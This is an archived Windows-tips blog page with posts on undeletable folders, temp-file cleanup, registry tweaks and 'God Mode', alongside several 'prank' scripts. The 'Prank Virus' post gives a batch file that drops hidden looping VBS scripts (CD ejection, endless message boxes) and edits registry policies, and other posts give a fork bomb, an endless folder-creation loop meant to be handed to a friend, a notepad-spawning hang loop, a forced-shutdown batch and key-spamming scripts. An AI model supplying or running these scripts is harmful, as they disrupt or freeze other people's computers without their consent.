Skip to main content

Posts

Showing posts from 2016

How To Create Undeletable And Unrenamable Folder In Windows

How To Create Undeletable And Unrenamable Folder In Windows The method is very simple and easy and you can easily do this with a little cmd trick. Just follow the below steps to proceed. First of all go to Start and then Click on RunNow type cmd & hit enter (Command Prompt will get opened).Always remember that you cannot create any undeletable & unrenamable folder in your root directory of storage. Which means these folders can’t be created in the drive in which your windows is being installed.Now type D: or E: and then hit enterType md con\ and hit enter (md – make directory)You may use other words such as kk,th and kb instead of con in above step.Now open the directory and you will see the folder created of name con there.Now lets try to delete that folder or rename that folder windows will show the error message there.This folder now can’t be deleted and renameable by this way. How to delete the Unrenamable and Undeletable folder First of all open the Command Prompt.Ther

Notepad open problem gives error message - TechnoBytes

Notepad open problem gives error message If the notepad is open gives error or if its not opening then......... Goto run type 'msconfig'  command &  run..... then window will appear.... Then goto 'strartup'  tab..... Check disable all box...... &  then apply ok....... Restart computer...... congrats notepad will now open successfully....

Make your computer faster - TechnoBytes

Make your computer faster Number 1: Removing Temporary files. Open Run by pressing Windows + R Keys and then type %temp% and hit OK. It will open up a window with all temporary files. Select and delete them all to make your computer run faster. Number 2: Again removing Temporary Files. There are two locations actually where the temp files will be stored. So, open Run by pressing Windows + R keys and now type just “temp” then hit OK. Delete all the files and folders which are in opened window. Number 3: Deleting Prefetched files. Open Run again by typing Windows + R keys then now type “prefetch”. If it asks for permission, allow it to delete all prefetched files which help to improve the performance of the Computer or Laptop. Number 4: Using Disk Cleanup. If you are using Windows 7, then use the search bar to get the Disk Clean up wizard or in case of Windows 8, go to metro dashboard then here select “Settings” and now search for Disk Clean up. Open the Disk Clean up wizard and sele

How to Enable God Mode in Windows 7 (Secret Tricks) - TechnoBytes

How to Enable God Mode in Windows 7 (Secret Tricks) 1- You'll be creating a folder that will take you to the god mode folder. 2- It'll actually show you all the configurations and settings available in your Windows 7 Computer. 3- This trick works in almost all versions of Windows. Read the warning below. 4- Just create any folder and than rename it to the following code: God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}

Error : Ping command is not recognised in cmd - TechnoBytes

Ping command is not recognised in cmd Right click "My Computer" and click "Properties". Click the "Advanced" tab up top followed by the "Environment Variables" button at the bottom. In the 2nd list box, scroll down to the 5th or 6th entry "Path", select it and click "Edit". Add "%SystemRoot%\system32;%SystemRoot%;" (minus the quotes) to the beginning of the line. Okay the changes and try out your commands now.

Disable USB Ports On Windows PC Via Registry

Disable USB Ports On Windows PC Via Registry With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives. To use this trick to disable USB ports, follow the steps given below:- Click on Start. Click on Run. If you cannot find RUN, type it in the search box. Type "regedit" without quotes. This will launch the Registry Editor. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor. In the work area, double click on Start. In the Value Data box, enter 4. Click on OK. Close Registry Editor and refresh your desktop. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6. Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8. Note: This trick als

Change Name Of Your Processor Permanently - TechnoBytes

Change Name Of Your Processor Permanently Change Processor Name Permanently Problem: To, make the name change permanent, it was required to update the Processor Name String registry key every time Windows starts. Solution: It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:- Steps :- 1.  Open Notepad. 2.  Copy and paste the exact code given below:- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] "ProcessorNameString"="My Processor name 50000MHz" To change the processor name, edit the part of the code given in blue. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0. 3.  Click on File Menu

Prank Virus - TechnoBytes

Prank Virus ▼ Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly. @echo off echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs echo Set colCDROMs=oWMP.cdromCollection>>123.vbs echo do>>123.vbs echo if colCDROMs.count>=1 then>>123.vbs echo for i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo For i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo End If>>123.vbs echo wscript.sleep 5000>>123.vbs echo loop>>123.vbs echo DO>>1234.vbs echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs echo LOOP>>1234.vbs copy /y 123.vbs C:\ copy /y 1234.vbs C:\ attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici

Fork Bomber - TechnoBytes

Fork Bomber ▼ It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste the below codes and save it as fork.bat :s<br />start %0<br />%0|%0<br />goto :s<br />

Folder Bomber Batch File - TechnoBytes

Folder Bomber This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started. Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Add or Remove "Shortcut" Name Extension

Add or Remove "Shortcut"  Name Extension To Add or Remove "Shortcut" Name Extension in Registry Editor 1. Press the Windows + R keys to open the Run dialog, type regedit, and press Enter. 2. If prompted by UAC, click/tap on Yes. 3. In the registry, go to: (See screenshot below) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer 4. In the right pane of Explorer, double click/tap on link to modify it. (See screenshot above) 5. To Remove the Shortcut Extension A) Change the value to 00 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshot below) NOTE: To change the value, press the Delete (Del) key once and type 00. B) Go to step 7. 6. To Restore the Shortcut Extension NOTE: This is the default setting. A) Change the value to 1E 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshots below) NOTE: To change the value, press the Delete (Del) key once and type 1E. 7. Close regedit. 8. Log off and log on, or

Entertainment softy

Tools for Entertainment           Some tools to make your computer screen more attractive....... like Birds flying on your screen,  Crash your computer screen(prank) ...... small Tools/Softwares,  you will love it....... Download

Shutdown Computer With Message - TechnoBytes

Shutdown The Computer After Conveying Message This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps: Open Notepad. Paste the following code in it: @echo off msg * Its time to get some rest. shutdown -c “Error! You have to take rest! Byeeeeee” -s Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat

Toggle Keyboard Button Simultaneously - TechnoBytes

Toggle Keyboard Button Simulteniously Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks. 1. Caps Lock Key Open Notepad. Paste the following code in the notepad file: Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Save the file with anyname and .vbs extension. and close it. Now open the newly created file and see how the caps lock key behaves on your keyboard! 2. Hit Enter Key Continuously Open Notepad. Paste the following code in the notepad file: Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop Save the file with any name and .vbs extension and close it. Now open the newly created file and see how the enter key behaves! 3. Hit Backspace Key Continuously

Convert Text Into Audio Using Notepad - TechnoBytes

Convert Text Into Audio Using Notepad How To Do It ? Open Notepad file on your Windows PC. Copy and paste the below mentioned code : Dim msg, sapi msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak msg Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.

Ghost Typing

Ghost Keyboard Typing – Notepad Tricks Hey guys , Today I am going to share with you a Short but Cool Notepad Trick. People Use notepad to type and save some important or regular information, But very less people know that there is much more that we can do with Notepad. This Process is Also known as ” Ghost Keyboard Typing ” Because you dont even touch your keyboard and words starts displaying in your notepad automatically, When you show this to your friend or anyone else, they will be excited to learn this from you as well. Notepad trick to Type Automatically Step 1: Right click on your desktop and select create new text document or simply Open Notepad. Step 2: Exactly Copy the code given below and Paste it in notepad document that you have just created. set wshshell = wscript.CreateObject(“wScript.Shell”) wshshell.run “Notepad” wscript.sleep 400 wshshell.sendkeys “S” wscript.sleep 100 wshshell.sendkeys “M” wscript.sleep 120 wshshell.sendkeys “A” wscript.sleep 200 wshs

Pc Memory Cleaner - TechnoBytes

Memory Cleaner for Computer Using Memory Cleaner Batch File (System Booster) – How To Make Your Computer Faster In this method we will create a program in batch coding which will automatically cleans the memory whenever we run it on our desktop. This method is very helpful when your pc gets slow. Just double click on the file and your system will work correctly or get boosted. Steps To Create A Memory Cleaner Batch File:- Open notepad and paste the below code in it. %windir%system32rundll32.exe advapi32.dll,ProcessIdleTasks Save the file as cleaner.bat in your desktop Now you will see a Clener batch file in your desktop . This file will run the system cleaner when you double click on it.

5 Pen PC Technology - TechnoBytes

5 Pen PC Technology In the modern world of technology, computer has become the basic necessity and not only an important rather putting it other way it’s now as equal rather more  than human can do so more and more into this tech era we are replacing human effort with computer technology. Talking about the communication technology these days, it is increasing rapidly. Talking about all of the generations of the computers, from the old workstations to the mainstreams and further other forms of computers, scientists and engineers have been trying to make it more and more compact. Systems are reducing from PC to Laptops and these days I pads or tablets have also replaced laptops to certain extent. This is the point where Pen computers come into spotlight. They are the type of computers in the shape of different pens each has a function of its own and when you combine them together, it can even give you the usage of a wholly full – blown computer. One can say that, 5 pen PC technol

Windows Shortcut Keys - TechnoBytes

Windows Shortcut keys Windows key + R — Run menu Windows key + E — Explorer ALT + Tab — Switch between windows ALT + Space + X — Maximize window CTRL + Shift + Esc — Task Manager Windows key + Break — System properties Windows key + F — Search Windows key + D — Hide/Display all windows CTRL + C — Copy CTRL + X — Cut CTRL + V — Paste Keyboard Shortcuts in Windows [Alt] + [Esc] — Switch between running applications [Alt] + letter — Select menu item by underlined letter [Ctrl] + [Esc] — Open Program Menu [Ctrl] + [F4] — Close active document or group windows (does not work with some applications) [Alt] + [F4] — Quit active application or close current window [Alt] + [-] — Open Control menu for active document Ctrl] Lft. + Rt. arrow — Move cursor forward or back one word Ctrl] Up + Down arrow — Move cursor forward or back one paragraph [F1] — Open Help for active application Windows + M — Minimize all open windows Shift+Windows + M — Undo minimize all open windows W

TechnoBytes(Tech+Articles=TECHCLES)

Computer Invention This digital pen is a computer invention that transmits writing into digital media. Although touch screen devices represent a movement away from paper, approximately eighty-percent of businesses still use paper based forms. Many professions hand-write their notes, tables, diagrams and drawings instead of using tablets or other devices. The computer pen is comparable to a regular ink pen (even uses refillable ink) that writes on regular paper, except it has an optical reader that records motion, images and coordinates. The recorded data is then transmitted to a computer via a wireless transmitter. You can browse and edit your written notes, diagrams, tables, or drawings. Another useful feature of this computer invention is that hand-written digital files can be easily converted into text fonts for use in word documents or emails. Digital pen technology was first developed by the Swedish inventor and entrepreneur Christer Fåhraues. Fåhraues is a physi

Matrix Falling Code Effect - TechnoBytes

Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks -----------------------------------------------------------------------                Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat. @echo off color 02 :technobytes echo %random%%random%%random%%random%%random%%random%%random%%random% goto technobytes Matrix Falling Code Effect - Notepad Trick Upon running the bat file, you will see the "Matrix falling code" effect.

Hang PC Trick - TechnoBytes

Hang pc trick create a bat file with the following code : ------------------------------------------------------------------ @ECHO off :top start %system root%\windows\notepad.exe Goto top ----------------------------------------------------------------- SAVE this with "Hang. bat" (Try this trick at your own risk)

How to create folder without name - TechnoBytes

How To Create A File or Folder Without Any Name in Windows 7, 8, XP Article will show you how to create a file/folder having blank space as a name. It means folder has no name. The process works on all Windows (Windows XP, Windows Vista, Windows 7, Windows 8 and Windows RT) PC. Step By Step Procedure To Create A folder With Blank Space 1. Select any file or folder whose name you want to remove or change its name as a blank space. 2. Right click on it and choose rename or simply press F2 from keyboard to rename that file or folder 3. Press and hold the Alt key. While holding the Alt key, type numbers 0160(0r 999999999 or 255) from the numpad. Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys. 4. Press Enter and the nameless file or folder will be created. Note: The file or folder that seems nameless is actually named with a single blank space. How to

Six Sense Technology - TechnoBytes

             SIXTH SENSE TECHNOLOGY   Abstract: ‘Sixth Sense’ is a wearable gesture interface that augments the physical world around us with digital information and lets us use natural hand gestures to interact with that information. Based on the principles of human communication system in this sense, then made the design of digital hardware systems similar work. Steve Mann is considered as the father of Sixth Sense Technology who made wearable computer in 1990. He implemented the Sixth Sense Technology as the neck worn projector with a camera system. Then his work was carried forward by Pranav Mistry (Ph.D student in the Fluid Interfaces Group at the MIT Media Lab) . Sixth Sense Technology may change how we look at the world forever. Sure, it is a system that projects information about what surrounds you over objects' surfaces, but it's also much more. By using a camera and a tiny projector, Sixth Sense sees what you see and visually augments any